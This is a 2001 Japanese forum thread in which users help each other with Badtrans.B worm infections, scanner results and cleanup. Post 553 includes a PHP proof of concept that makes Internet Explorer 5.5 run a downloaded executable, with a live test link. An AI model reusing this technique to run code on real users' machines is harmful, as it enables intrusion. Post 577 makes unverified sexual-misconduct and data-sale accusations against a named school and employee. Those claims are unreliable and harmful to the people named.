そうなんですよ。「transfer」っていうのはどっちとも取れるんで
すごく悩みました。
しかも3日ほど前に、そこのドメインのサイト訪問してたもんで、
ウイルス定義を常に最新にしていたにもかかわらず、非常に
不安になりました。

ほんとにあの英文はなんとかしてもらいたいです。
499498:01/12/06 19:40
あ、「traffic」でしたね。間違い間違い。
500ネット屋 ◆.t4dJfuU :01/12/06 19:47
>>495
くっ!このスレだったか(w
-----------------------------------------------------
”message”は”CVDL W95/Badtrans.B”に感染していました。
ウィルスと一緒に”message”はファイルごと削除されました。
-----------------------------------------------------
これですね!ありがとうございました!
501名無しさん@お腹いっぱい。:01/12/06 20:47
WindowsXPを使っています。
おとといウィルスに感染した知り合いのパソコンから送られた
添付ファイル付メールを受信しました。
ウィルスバスターに何の反応もなかったので、ファイルをダブルクリックしてしまいました
その後それがウィルスメールだとわかったのですが
特に、ウィルスに感染したらしき兆候はありません
ダブルクリックしたら、絶対感染しているのでしょうか?
ウィルスバスター2002でも、検出されません。
502名無しさん@お腹いっぱい。:01/12/06 20:50
>>501
聞きたい。
んじゃ君はウイルスに感染した兆候として
どんなもの想定してる???
レス次第によっては今後の展開変わってくる(W
503名無しさん@お腹いっぱい。:01/12/06 21:02
メールを送信していないみたいなのです
ワーム活動をすると聞いたのですが・・・
504名無しさん@お腹いっぱい。:01/12/06 21:02
>>502
すみません、503は501です
505名無しさん@お腹いっぱい。:01/12/06 21:05
>>504
ウイルス名何だったのよ?
506501:01/12/06 21:05
きたファイルはPICS.DOC.scr(29.0KB) 、ATT00002.TXT(0バイト)です
これは全くウィルスバスターが反応しませんでした。
これとは別に、もう一つ来たのですが、それはウィルスバスターに阻まれて大丈夫でした
>>501
ちゃんとこのスレの1から全部読んだ?
>>506
スキャンした時の、ウイルスバスターのパターンファイル番号は?
509501:01/12/06 21:06
>>507
読んだのですが・・・
すみません、もう一度読んでみます。
510501:01/12/06 21:07
>>508
すみません、パターンファイル番号がわかりません。
もうちょっと勉強してきます。
511名無しさん@お腹いっぱい。:01/12/06 21:07
>>501
ウィルスバスターを新しい定義に更新してましたか?
512501:01/12/06 21:09
>>511
はい、していました。
513名無しさん@お腹いっぱい。:01/12/06 21:10
>>506
ウイルス来た時はちゃんと自分で検出ログ見て、ウイルス名解ったら
ウイルスデータベース見に行く事。
それでも解らない事有ったら聞きに来な。
コレ自分でしないでこんなところでサクッと聞いて解決してたらいつ
まで経ってもダメダメ。
514501:01/12/06 21:14
>>513
すみません、検出ログもウィルスデーターベースもシマンテックもトレンド
マイクロも見に行って、ここも読んで、ファイルも検出してみて
人にも聞いてみたのですが、それでもわけわからなかったのです。
('_`)ウゥ、私ダメダメですね・・・・。もう一周してきます。
>>514
このスレで、「受信して開いたけど感染しなかったのは何故?」
って内容の質問とその答えなかった?
このスレになかったら、前スレと前々スレも見てみてください。
516501:01/12/06 21:18
>>515
ありがとうございます
ありがとうございます
見に行ってきます。
長々申し訳ありませんでした。
517九州男 ◆8U2HuhRg :01/12/06 21:20
>501
まずウイルスバスターが反応しなくても不明なファイルは
開かない事だね。いくら知り合いでも。
なーんも書かないで送りつけた添付ファイルなんて
もしウイルスでなくても削除されてあたりまえ。

つーか俺なんかマカフィーなんか今まで反応した事無いぞ!
それでもウイルスは乗り切ってきた。
518501(九州女):01/12/06 21:24
>>517
はい、本当に・・・・
今回の事で学びました。
もう絶対開けません
ありがとうございます。
519ネット屋 ◆.t4dJfuU :01/12/06 21:27
>>517
漏れなんか自作PCだからプリインストールのソフトなんか何にも無いぞ。
BlackICEはちゃんと買って入れたが、ウィルス関連は無くて困ったことが
なかった。今まで怪しいのが来たら、全部保存してオンライン検出してた。
しかし今回感染初体験(ぽ
でも勉強したから、やっぱり買わない(w
520九州男 ◆8U2HuhRg :01/12/06 21:38
>518
なんだ同郷人か(w
まあXPならIEも6だろうし・・・と勝手に推測するけど
プレビューでは感染しない。
ただファイルを実行すれば感染する。

ただし日々セキュリティホールは発見されてるので
油断は禁物です。IEを使っている限り・・・

あとはyahooニュースのコンピュータカテゴリには
ウイルスの発見報告が毎日のようにのります。
チェックしましょう。
521501(九州女):01/12/06 21:42
>>520
はい、ウィルスバスターに反応しないので、
ガッチョンガッチョン、クリックしてしまいました。
2回も3回も・・・
ありがとうございます。yahoo見に行きます
今過去ログの1から読んでます。
それでもわからない私は、
ゲームウォッチでもやってなってことですね(;_;)
522九州男 ◆8U2HuhRg :01/12/06 21:46
>519
むしろプリインストールで安心してるユーザの方が
問題かもね。
つーか今回は俺も感染したし(曝
アンチウイルスソフトなんて当てにならんね。
ホットメールのマカフィ対応遅い!
ファイアウォール反応してなかったら大変だった。

その後は自分でネットで検索して対策してからこのスレ
発見した。

その後のウイルスはoutlookのパッチのおかげで削除
されてたし。
523九州男 ◆8U2HuhRg :01/12/06 21:55
>521
オンラインスキャン実行したか?

>ネット屋さん

わしのプレインストール版マカフィさん定義ファイルの
更新バージョン11/21だ・・・この後は無いみたい(w
524名無しさん@お腹いっぱい。:01/12/06 21:56
九州人が標準語(外国語)など使うな
525501(九州女):01/12/06 21:59
>>523
>オンラインスキャン実行したか?

はい。
結果です。
E:\System Volume Information\_restore{72CB9E59-235C-4855-98A8-F28CEE74894E}\RP20\A0008874.scr は 次のウィルスに感染しています: W32.Badtrans.B@mm
E:\System Volume Information\_restore{72CB9E59-235C-4855-98A8-F28CEE74894E}\RP20\A0008878.scr は 次のウィルスに感染しています: W32.Badtrans.B@mm
E:\System Volume Information\_restore{72CB9E59-235C-4855-98A8-F28CEE74894E}\RP20\A0008880.scr は 次のウィルスに感染しています: W32.Badtrans.B@mm

なんか心細さから、ここに貼りついてしまってます。
ごめんなさい。ありがとう(;_;)
>>525
このスレの>>7と同事象なのでは?
527九州男 ◆8U2HuhRg :01/12/06 22:08
>525
駆除ツールは実行したか?
528九州男 ◆8U2HuhRg :01/12/06 22:10
>526
それもそうだ・・・
既出でしょうが…5.00でも感染しちゃいました。
530501(九州女):01/12/06 22:17
>>526
ありがとうございます
やってみます。
>>529
へ?それはIEのバージョンのこと?
情報はなるべく詳しく書いてください。
不安なら、HDDをフォーマットし直せ
>>506
げっ、、、、GONEじゃん。
ウィルスを検知するファイルを壊すやつじゃん。
だから検知できなかった、という可能性は?
こわー。もしそうなら。
>>533
GONEの添付ファイルは "GONE.SCR"では?
535 :01/12/06 23:09
>>533
PICS.DOC.scr はBADTRANS.Bの添付ファイル命名規則に
沿った名前ですが。
>>535
あ、そのようです。
ご指摘ありがとう。
マジびびってしまいました。
537ネット屋 ◆.t4dJfuU :01/12/06 23:26
んごっ。
病気が来た。
「docs.D.pif」って添付なんだけど、
http://housecall.antivirus.com/housecall/start_jp.asp
で見つからないぞ〜
もうよくわからなくなってきた。ソフト買うかなぁ(w
538名無しさん@お腹いっぱい。:01/12/06 23:45
メインのPCがイカレてしまいました。
Windowsを立ち上げようとすると
青い画面になって
「例外OEがVXD MCSCAN32(01)+000188CFの
0028:CC2DAA8Fで発生しました」
っていうメッセージが出るんですけど,
BADTRANS.Bの仕業なのでしょうか?

ちなみに今は予備のPCを使って書き込んでます。

ネタじゃないです。
マジ困ってます。
539名無しさん@お腹いっぱい。:01/12/06 23:51
>>538

アンチVirは、マカフィー入れてると見た。
違う??
540501(九州女):01/12/06 23:55
ウィルスチェックで検出されませんでした。無事駆除されたようです。
お世話になった方々、本当にありがとうございました〜〜。
それにしても、PICS.DOC.scr ←これがウィルスバスターにかからなかったのはなぜでしょう???
不思議・・
541名無しさん@お腹いっぱい。:01/12/06 23:56
スレ違いっちゃぁスレ違いなんだが
ゴナーは来てますか?
悪質だけど 拡がりは少ないのかな?
できたら このスレで続けてもらいたいな
542538:01/12/07 00:00
>>539
はい,入れてます。
Windowsが起動できないもんで,
手の施しようがないんですけど…

ウイルスかどうかも分かりません(泣
543538:01/12/07 00:02
すいません。
スレ違いっぽいので
他のとこに逝きます
544名無しさん@お腹いっぱい。:01/12/07 00:02
>>540
添付ファイル、ウイルスが元々持ってるバグのせいで
壊れてたと思われ。
base64コード壊れてりゃパターンファイル検出は無理。
その前に、ウイルス自体動かない。
良かったね。日ごろの行い良いみたい(w
545九州男 ◆8U2HuhRg :01/12/07 00:05
>540
定義ファイル本当にアップしてる?
ファイヤウォールは導入済みだっけ?
546539:01/12/07 00:06
>>542
そうだと思った。
でも、漏れマカフィーユーザーじゃないから詳しい事教えられぬ。。。スマヌ。
マカフィーダメダメ関係スレ逝って見れば、なんか得られるかも。
>>542
マカフィーってだめなの!PART2
http://pc.2ch.net/test/read.cgi/sec/1007480057/
548538:01/12/07 00:13
>>546,547

どうもありがとうございます!
短い間でしたがお世話になりました。
549501(九州女):01/12/07 00:14
>>544さん
ありがとうございます。なんかうれしい・・・。

>>九州男さん
て、定義ファイルとは・・・?
ウィルスバスタ2002は入っていて、ファイアーウォールは有効にしていて
最新バージョンもダウンロードしてるのですが・・・
>>549
定義ファイル … シマンテック用
パターンファイル … トレンドマイクロ用

パターンファイルは、現在977 または177であればOKでしょう。
551九州男 ◆8U2HuhRg :01/12/07 00:22
>549
ウイルス定義ファイルのこと。
最新バージョンが何をさしてるのか解らんけど。
(ウイルスバスターユーザで無いので・・・)

まあファイヤウォール有効ならとりあえず二次感染は防げるだろうし。
552ネット屋 ◆.t4dJfuU :01/12/07 00:34
>>537
やっぱり、BADTRANS.Bだった。名前がおかしいじゃんねぇ。ぷんぷん
553よくわからん!:01/12/07 01:01
こんな内容の php スクリプトを用意し、

<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>

これを readme.txt という名前で保存する。で、AddType application/x-httpd-php .txt する。で、IE からアクセスしてみる。

 IE 5.01 SP1 や IE 6 からアクセスすると、「次のファイルをダウンロードしています - readme.txt - ファイルを開くか、ファイルを
コンピュータに保存するか選択してください」というダイアログが出る。で、「開く」と答えると、今度は「次のファイルをダウンロードしています - calc.exe -
ファイルを開くか、ファイルをコンピュータに保存するか選択してください」というダイアログが出る。これは正常だ。

 ところが、IE 5.5 SP2 からアクセスすると、「次のファイルをダウンロードしています - readme.txt - ファイルを開くか、ファイルをコンピュータに保存するか選択してください」というダイアログが出たときに
「開く」と答えると、いきなり calc.exe が実行されてしまうのだ。あな恐しや。手元では IE 5.01 SP2 / 5.5 SP2 / 6 on Windows 2000 SP2 で確認した。

 実験したい人は http://www.st.ryukoku.ac.jp/~kjm/test/readme.txt にアクセスされたい。ここでは calc.exe ではなく lhasa016.exe になっている。
554501(九州女):01/12/07 01:16
>>550さん
ありがとうございます。まさに177でした。
九州男さん
本当にありがとうございます。
やっとやっとほっとしました。
ああ、こわかった・・・(;_;)

ほんとうにありがとうございます
555九州男 ◆8U2HuhRg :01/12/07 01:20
>554
必要以上に怖がる必要は無いけど
防犯は必要です。

知らない男の人にはついて行ってはいけません。
インターネットも同じです。

がんばって下さい。
556四国男 ◆BKEg1Cns :01/12/07 01:30
何か良く分からんが、とりあえず良かったね>九州女

漏れもさっきREADME.MP3.scrってのが来て、ググルで検索したらそうだといわれたよ。

ま、マカーなんで関係ないけどね。
557501(九州女):01/12/07 01:40
>九州さん、四国さん

ありがとうございます。ありがとうございます。
本当にありがとうございます
(しつこく出てきてごめんなさい。)
オンラインチェックは両方共試してみました。
それで、ウィルスは検出されなかったので安心してるんですけど、
まだイマイチ心配。
それから、圧縮ファイルはスキャン出来ませんでした、というメッセージが
出たのですが、それに関してはどう調べれば良いのでしょうか。
メール専用にチェックするものもあるみたいですけど、それは試していません。
大丈夫ですか?
560ネット屋 ◆.t4dJfuU :01/12/07 08:02
>>552
結局漏れもトレンドマイクロのオンラインチェックでは検出できなくて、
シマンテックのオンラインチェックでは検出される「BADTRANS.B」を確認
しました。シマンテックのはディレクトリの指定が出来ないから時間が
かかるんだよな。でも検出漏れのあるトレンドには疑問を感じるぞ。
今日メールしてみよっと。
>>553
http://pc.2ch.net/test/read.cgi/sec/1006787500/199
にあった情報なんですが、
http://isweb27.infoseek.co.jp/computer/zaddik/
で無害な病気で当該セキュリティホールのチェックが出来るようです。
これだとどうなりますか?漏れ全部IE6にしちまったもんで(汗
561ネット屋 ◆.t4dJfuU :01/12/07 08:05
>>558
病気部分をユーザの自力で圧縮(LZHやZIP)して出来たファイルはスキャンできない
と言う意味だと思います。普通の人は気にしなくて大丈夫だと思います。
>>559
「メール専用のウィルスチェックと言うものがある」と言うことですか?
562558:01/12/07 08:38
>>561
教えてくださって、どうもありがとうございます。
気が楽になりました。
563ひよこ名無しさん:01/12/07 09:27
>>1
教えてください!
シマンテックのオンラインチェックしたらJS.Exception.Exploitの
ウィルスに感染していますって表示されました。
それは1個のファイルでcounter[1].jsです。
これはどんなウィルスでどんな影響があり削除や修復の仕方で一番良い
のはどの方法ですか?
調べたらcounter[1].jsは無いけれどcounter.jsが2個見つかりましたが
それを削除するとまずいでしょうか?
564九州男 ◆8U2HuhRg :01/12/07 09:56
>563

オンラインスキャンできるなら自分で調べられるでしょう?
ウイルス名も出てる事だし。。。。
きっちりシマンテックのサイトで検索して出てきます。

それにここはBadtrans.Bスレです。
565名無しさん@お腹いっぱい。:01/12/07 10:34
Badtrans.Bが来た。これまでにも沢山来ているがセキュリティホール
ふさいでしまったので無効化されるから安心。

今日来た添付ファイル名は
ハムスター.Doc.pif だった。
チョトカワイー とか思ってウィルスにほのぼのしてしまったよ(藁
566>565:01/12/07 10:37
Hybris?
567ネット屋 ◆.t4dJfuU :01/12/07 11:23
>>560
結局感染前の、つまりメールとしてだけBADTRANSウィルスが存在している状態では
トレンドマイクロの方では検出できないみたいですね。発症すればもちろん見つけて
くれるんだろうけど。

1.病気のメールが届く
2.あれ?これなんだろう?病気かな?検査しよっと
3.トレンドマイクロで検索→病気は見つかりませんと出た
4.なんだ病気じゃないんだ、実行、えいっ!
5.感染、発症、マズー

おっ恐ろしい・・・。なんだかなぁ。
568名無しさん@お腹いっぱい。:01/12/07 11:54
OE6でさHTML形式のメールを受け取らないように出来ないかな?
569名無しさん@お腹いっぱい。:01/12/07 11:56
フリー&シェアウェアのリストが要るね
Edmaxフリー版がおすすめ
570名無しさん@お腹いっぱい。:01/12/07 12:00
[email protected]

このウィルス送りつけてきた知らんアドレスの人のメアド。。。
これってこの人が感染して、この人のアドレスに載ってたからきたのか、それとも故意なのか。。
つーか見るだけで感染ってそりゃ無いよ。。。
571九州男 ◆8U2HuhRg :01/12/07 12:03
アドレスさらすなよ・・・
キミも感染してメアドさらされてくだちい。>>570
573名無しさん@お腹いっぱい。:01/12/07 12:07
おれはカーネルとかいうウイルスに感染した。
メール感染でそのメールを見なくても感染した。
対策ないですか?
574九州男 ◆8U2HuhRg :01/12/07 12:12
>570
つーかネタか?

>573
そんだけの情報じゃ解らん。
575ネット屋 ◆.t4dJfuU :01/12/07 12:14
>>573
「おれはカーネルとかいうウイルスに感染した」と断言する根拠はなんでしょうか?
576ネット屋 ◆.t4dJfuU :01/12/07 12:15
あらま。晒しはまずいっす。sageなかった。くぅ
577縞栗鼠(シマリス)の親方:01/12/07 12:17
中央高等学院の従業員「西部」が女子トイレに闖入し
汚物入れを物色して女子生徒の使用済みタンポン・ナプキン等を
個人的に収集しているというのは事実。

中央高等学院では
生徒及びその保護者の個人情報を名簿図書館等に売却しています。

中央高等学院
http://www.chuo-school.ac/
http://chs-f.com/index.html 中央高等学院福岡校
578573:01/12/07 12:17
友人から感染メールいったかも。って電話がきて、
見てみたらそうだった。おれのアドレス帖にある全部の人に
そのメールがいったそうな。
579九州男 ◆8U2HuhRg :01/12/07 12:20
>578

結局プレビューしてるのか・・・
580ネット屋 ◆.t4dJfuU :01/12/07 12:25
> 友人から感染メールいったかも。って電話がきて
友人が感染していて、その友人からあなた宛に病気のメールを
出してしまったかも知れないと言う電話があったと言う意味に取っていいですね?

> 見てみたらそうだった。
自分のPCでメールを受信したら、確かにその友人からのメールが来ていた。
と言う意味でいいですね?

> メール感染でそのメールを見なくても感染した。
友達からその感染メールを見ていないと言う意味ですね?でも上では
「見てみたら」とあります。これは、「OEの右下の画面に出した」と
言う意味でしょうか?

> おれのアドレス帖にある全部の人にそのメールがいったそうな。
あなたのPCのOEのアドレス帖にある全部の人が、あなたから病気のメールを
受け取ったと連絡があったと言う意味ですね?

まず、>>1の手順に従ってみて下さい。
581573:01/12/07 12:26
ただ、「カーネル」なんて調べても出てこないから、
別の名前のウイルスかも?
(友人が、たしかカーネル、といってた。)
582ネット屋 ◆.t4dJfuU :01/12/07 12:28
>>581
とにかく>>1に従ってください。他の病気も発見できます。
また、今回このスレで扱っている病気の通称は「BADTRANS.B」ですが、
病気が使用するファイル名に「kernel32.exe」と言うものが含まれます。
日本語発音すると、「カーネル」です。ただいま大流行しているので、
この「BADTRANS.B」に感染している疑いが濃いです。
とにかく、>>1に従って下さい。
583九州男 ◆8U2HuhRg :01/12/07 12:29
ネット屋さんはやさしーなァ
俺は大分疲れてきた・・・

話がぐるぐる廻ってるし。

サポセンのおねーさんは偉いんだねェ
584573:01/12/07 12:30
580さんありがとう。
あの、メールを開くときってそのメールのとこをくりっくするでしょ。
それをしなくても、カーソルをあわせただけで感染しました。
ほかはあなたの言うとおりです。
585573:01/12/07 12:32
582を今読みました。
マジでありがとうございます。
586ネット屋 ◆.t4dJfuU :01/12/07 12:40
>>584
向学のため教えてください。
「カーソルをあわせた」とは、キーボードの上下キーで、選択部分(横に青く
なっている部分)をそのメールにあわせたと言う意味ではなく、マウスのカーソル
をそのメールに近づけて、クリック(シングルクリック)もしていない、
と言うことでしょうか?
587573:01/12/07 12:48
>586
まったくそうです。
だからそのメールを見なくても感染してしまいました。
58855号 ◆NC7w9Nx. :01/12/07 12:53
>>570
アドレスさらすのはまずいっすよ。
送ったのはほぼ間違いなくウイルスなんだから。
 仮に故意に送ったとしても、頭に「_」が付いたアドレスで送れるということは
自分のとは違うアドレスで送れるということなので
それ程のスキルがある者が自分のアドレスで送るというバカなことはしないはず。
故意に送るとしたら他人のアドレスを使うはず。
 どっちにしてもそのアドレスの人が故意に送った可能性はないよ。
>>573
メーラーや、IEのバージョンを書いていないとわかりません。
590名無しさん@お腹いっぱい。:01/12/07 13:11
>>538
あ、俺も昨夜、同じくらいの時間に同じコトになりました。

文字化けメールを受信した後です。
何か判ったことがあったら教えてくださいな。
>>570は島さとし
>>587
『ポイントして選択し、シングルクリックで開く』設定になってない?
>>586
 窓98からだったかな。webとの統合性っていうことで、マウス
のフォーカスで選択、シングルクリックで実行という動作がデ
フォルト。設定変えないとシングル選択・ダブル実行にならんの
よ。俺も知人のパソいじるときにこれで凹む。

 だから、設定変えてない環境だと、OEでは、マウスカーソルを
しばらくメールのタイトルに当てているだけでプレビュー、シン
グルクリックで開くわけよ。

 窓3.1からのユーザーだと、web仕様は違和感あるからすぐに
変更すると思われ。つーか、アクティブデスクトップはoffにす
るでそ。
NPIKNGNP.EXEって何?
595くそDION:01/12/07 14:05
このウイルスさDIONから届いた奴おるか?
596くそDION:01/12/07 14:09
DIONに問い合わせたらさ何にも対応してくれんかったわ。
そのかわり、ええこと聞いたで!
加入者しか使われへんSMTPサーバさ、加入者以外でも使えるみたいやで。
で、結果そのSMTPサーバ使ってウイルス送られてるみたいや!

DIONなんとかせえや!
597名無しさん@お腹いっぱい。:01/12/07 14:17
57通8通がDIONでしたが何か?
うち3人は警告メールにちゃんと謝罪・報告してきたし。
最悪はOCNで、12通あり返事ゼロ。
あとはbiglobe6通でこれも返事ゼロ。
プロバイダに文句いってみたことはないので、
そこらの具合は知らない。
>>596
説明の聞き間違いじゃないの?
599ネット屋 ◆.t4dJfuU :01/12/07 14:19
>>593
なるほど。そんな設定もあったんですね。
それだとすれば、マウスカーソル移動のみで感染の可能性アリって訳ですか。
恐ろしい。ありがとうございました。
>>594
さぁ、わかりません。ウィルスによってはランダムなアルファベットで病気を送りますよ。
このスレッドでは「BADTRANS.B」に特化していますので、ウィルスの心配がある
ようでしたら、別のスレッドで聞いてみてください。
600くそDION:01/12/07 14:22
>>598

あら、、DIONの方ね(w
>>600
少なくともこのウィルスに関しては故意にばらまいてるから
広まってる訳じゃないだろう?
「加入者以外でも使える」とかいう表現が疑問なんだよね。
まあ、プロバイダが○○すべし、とかいうのはちょっと前にも
議論があったところだし、あんまりこのスレでやるのもなあ。
やるんだったら雑談スレにでもいってやろうぜ。
603ネット屋 ◆.t4dJfuU :01/12/07 15:09
>>602
っすね。SMTPを誤解していそうな気がしますね。スレ違い失礼。
ちょっと思い出したこともあったんで、
雑談スレの方へもっていっておきます。
以後なにかある方はこちらへどうぞ。
http://pc.2ch.net/test/read.cgi/sec/1006859839/
605ネット屋 ◆.t4dJfuU :01/12/07 15:43
>>567
トレンドマイクロにはメールで知らせたが、放置プレイだろうなぁ。
606名無しさん@お腹いっぱい。:01/12/07 16:12
おれ、今日「BADTRANS.B」に感染した。
SP2入れて、その後に6にうpしてたから平気だろうと思って開いたんだよね。

そしたらアウツだったよ。

トレンドマイクロのワクチンをダウンして直したけど・・。
607ネット屋 ◆.t4dJfuU :01/12/07 16:15
>>606
開いたらどんなメーラーでもアウトっす。>>2
608名無しさん@お腹いっぱい。:01/12/07 16:22
感染を連絡したメールの返信は、見事にHTMLだった。
「お宅に送った記憶もないし、送信記録もない」
だから、そういうウィルスなんだって。
「勝手にばらまくタイプ」だと書いた筈だよ。
説明ページのURL貼らない自分が迂闊だったかな。
質問責めにされるよりは、マシだろうけれど。
609 :01/12/07 16:27
outlookなどを使ってれば感染のリスクは高いよ。違うメーラにすれば。
610名無しさん@お腹いっぱい。:01/12/07 16:27
>608
ゴチャゴチャ説明しても読まないだろうから
図解:Badtransとは?
http://www.nai.com/japan/virusinfo/badtrans_zukai.asp

と、トレンドマイクロのオンラインスキャンと駆除ツールのURL貼っておきましょう
611608:01/12/07 16:36
>610

ありがとう。
今更だけど、返信用のテンプレ作り直しておく。
下火にはなったけれど、週末だからまた届く気がするし。
612ネット屋 ◆.t4dJfuU :01/12/07 16:41
>>610
シマンテックのオンラインスキャンをお勧めするっす〜
昨日に続いて2通目が来たよ!
ノートン先生が反応したけど、このソフトって検疫フォルダに移して、
削除でいいんだよね?
「警告!ウィルスを発見しました!」って出た状態で、削除は出来なかったよ。
614名無しさん@お腹いっぱい。:01/12/07 17:24
470です。
会社から質問してたので、書くだけ書いてそのままですみません。
今日も朝から仕事が落ち着けなくて今になってしまいました。
又、教えてちゃんですみませんが・・・

元々は、友達と私は同じ企業からウィルスメールを送られたんです。
2人共IE6.0で、添付ファイルを発見と同時に
私の方はすぐ、ウィルスバスター2000にかけたんです。
そうしたらウィルスが発見されたんですが、
それをどうやって処理すればいいのやら、ソフトの使い方も分らすに
モタモタしてました。
とりあえず削除と思って、ドローした途端にデスクトップが固まってしまって
再起動してから、メールを削除したんです。
気になるので、いろいろなサイトを見て、レジストリの修復ファイルもダウンロードし、
ウィルスチェックをかけたんですが、そうしたら居てたんですぅ〜(;_;
KERN32.EXEが!とりあえずそれも消して、ウィルスチェックして
無くなった〜〜と、ほっっ、としたんですが、
念の為もう一度ここを読み返してたんですが、ノートンのチェックはしてなかったので
それもしておこうと思って、インストールしようとしたら
Active X が開けないとか表示されて、チェック出来ません。
どこかおかしいんでしょうか???
友達はもう、インストールし直すらしいんですが、私はもう、不安で。。。
ちなみに私からウィルスメールが送られた報告はありません。
どうか、助言お願いします。
615ネット屋 ◆.t4dJfuU :01/12/07 17:35
>>614
> ドローした途端に
ドラッグですか?フォルダオプションがWebスタイルになっているのかな?
デスクトップにあるアイコンはシングルクリックで動作しますか?
IE6で感染してしまったと言うことは、何らかのメッセージに「はい」を
押してしまったのではないかと推測しますが、「Windowsが固まった」との
ことで、それは、VB2000が関与しているのかも知れません。

いずれにしても心配でしたら>>1の手順を。ActiveXが動かないとのことですが、
>>372を確認してみてください。
616名無しさん@お腹いっぱい。:01/12/07 17:46
614です。
フォルダオプションは今見てみたんですが、カスタムでした(;_;
デスクトップはダブルクリックしないと動作しません・・・。
とりあえず、>> 359の操作をしてみます。
親切にありがとうございます〜(;_;
617ネット屋 ◆.t4dJfuU :01/12/07 17:47
>>615
ActiveXを動かす方法、シマンテックに書いてあるじゃん!
http://security2.norton.com/ssc/faq.asp?langid=jp&venid=sym&plfid=21&pkj=LKLCLGWSBZHYZIFKWOZ
618名無しさん@お腹いっぱい。:01/12/07 17:51
管理してるメールサーバーのログを確認すると、今回のBadtransってFrom:
を詐称するみたいなんだけど。

安易に相手に返信出す前にヘッダー確認して、Received: から判断した
ほうが良さそうです。本当に濡れ衣の可能性があるよ。
619ネット屋 ◆.t4dJfuU :01/12/07 17:58
>>618
下記以外にも?
"Mary L. Adams" <[email protected]>
"Monika Prado" <[email protected]>
"Support" <[email protected]>
" Admin" <[email protected]>
" Administrator" <[email protected]>
"JESSICA BENAVIDES" <[email protected]>
"Joanna" <[email protected]>
"Mon S" <[email protected]>
"Linda" <[email protected]>
" Andy" <[email protected]>
"Kelly Andersen" <[email protected]>
"Tina" <[email protected]>
"Rita Tulliani" <[email protected]>
"JUDY" <[email protected]>
" Anna" <[email protected]>
620616:01/12/07 18:12
せっかく教えてもらったのに、やっぱりインストール出来ません。。。
ActiveX がサポート外か有効になっていません 
っていう表示が出てきます。
サイト内をくるくる廻るだけで、何が原因なのか分りません(;_;
やはり感染して、どこかおかしくなってるんでしょうか・・・?はぁ・・。
621ネット屋 ◆.t4dJfuU :01/12/07 18:17
>>620
http://security2.norton.com/ssc/faq.asp?langid=jp&venid=sym&plfid=21&pkj=LKLCLGWSBZHYZIFKWOZ#Gen_FAQ_q5
1.ブラウザのメニューで[ツール]、[インターネットオプション]の順に選択します
2.[セキュリティ]ページを表示します
3.インターネットゾーンを示す地球のアイコンを選択します
4.[レベルのカスタマイズ]をクリックします
5.ActiveX とプラグインのセクションが表示されるまで下にスクロールします
6.[署名済み ActiveX コントロールのダウンロード]の下で[ダイアログを表示する]を選択します
7.[ActiveX コントロールとプラグインの実行]の下で[有効にする]を選択します
8.[スクリプトを実行しても安全だとマークされている ActiveX コントロールのスクリプトの実行]の下で[有効にする]を選択します
9.[セキュリティの設定]ウィンドウを閉じるために[OK]をクリックします (このゾーンのセキュリティ設定を変更していいかどうか確認を要求するメッセージが表示されたら[はい]をクリックします)
10.[インターネットオプション]ウィンドウを閉じるために[OK]をクリックします
622620:01/12/07 18:26
設定は同じようでした。。。
どうしてでしょう???
私の頭ではもう、ちんぷんかんぷん(@_@~
623ネット屋 ◆.t4dJfuU :01/12/07 18:30
>>622
HDDの空き容量いくつぐらいありますか?
こんなアドレスの人から、ウィルスが来ました。
もし参考になれば・・・・。
"Shinichi Masuyama" <[email protected]>
"masako" <[email protected]>

プロバイダーに連絡しようか?架空メルアドかな?
625622:01/12/07 18:36
はっっ!そういう事があったんですか。。。
相当少ないと思います。。。
C:\が 682MB しか空いてません〜〜!
もしかして、これが原因でしょうか・・?(~_~;
626九州男 ◆8U2HuhRg :01/12/07 18:40
>624
だからメアドさらすなって!
なんの参考にもなんねーよ!
少しは前レス読め!
627622:01/12/07 18:47
とりあえず、HDDの中を整理してみます。
ネット屋さん、ありがとうぅぅ〜!!
又分らなかったら、相談にのって下さいね!
よろしくです!
628ネット屋 ◆.t4dJfuU :01/12/07 18:53
>>625
500M以上あれば大丈夫な気もします。
http://windowsupdate.microsoft.com/
で、「製品の更新」、をクリックし、「重要な更新」と
「推奨する更新 」をやってみてください。
その後、
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY

だめだったら、
IEのツール→インターネットオプション→全般→インターネット一時ファイル
「Cookieの削除」 と 「ファイルの削除」をやってみてください。

その後、
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY
に行って見てください。ちなみに、IE6だと「Cookie食う?」って聞かれると思うのですが、
この場合はOKをしてください。

これでもダメなら、c:\Windows\temp\*.* を全部削除してください。その後、
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY

後は何かあるかなぁ。
629名無しさん@お腹いっぱい。:01/12/07 19:46
ネット屋さん、大変。ご苦労さまです。

しかし、皆さんこれを機会にwindowsのお勉強を
「ちょっとは」してくださいね。
フォルダのカスタマイズやらワンクリックやら。
メーカーが「誰でも」って宣伝するのが悪いんだけど。
せめて買ったパソコンについてきたマニュアルをパラパラとぐらい
は見てください。お願い。
630:01/12/07 19:53
しかし、よく飽きないね>ネット屋
そんkするよ。
631東海女:01/12/07 20:07
失礼します。最近マカダメ住人なんですが
アウトルック(エキスプレスじゃない)のクリック1回(添付ファイルありの表示なし)の
REメールで、感染?しました。友人の名前で添付ファイルなし
だったんですが、REメールのため、即削除しようとしたら
かってに開いてしまいました。それで、マカフィーVSOが作動したのですが
駆除できず削除しました。

そのあとで、ファイル名をウロ覚えなのですが、>>537さんのようなDOCなんとか
ってのがあってどこかに保存しなさいとずっと聞いてくるんです。
それで、仕方なく保存してしまって、結局VSOがダメになった模様。

スキャンしようとすると、デバッガ画面になり、idVirusList.ColumnHeadersと
5行ありました。アンインストの時は、idProgress.Maxでデバッガ要求してきます。
そもそもPC初心者で、マカフィーを選んだ時点で終わっているのですが
デバッガその他よくわからなくて途方にくれています。
ちなみにレスキューDISKでは、ウィルスが見つかりませんでした。
ウィルスでなくて、マカダメってことなんでしょうか・・・
>>631
1.ウイルスがいないことを確認(レスキューディスクの定義ファイルは最新か)
2.最悪の場合に備え、必要なデータのバックアップ
3.マカフィーを上書きインストールする
4.上書きがうまくいったらアンインストール、レジストリも綺麗にする
4.添付ファイルが自然と開いてしまうようなアウトルックの設定を修正する
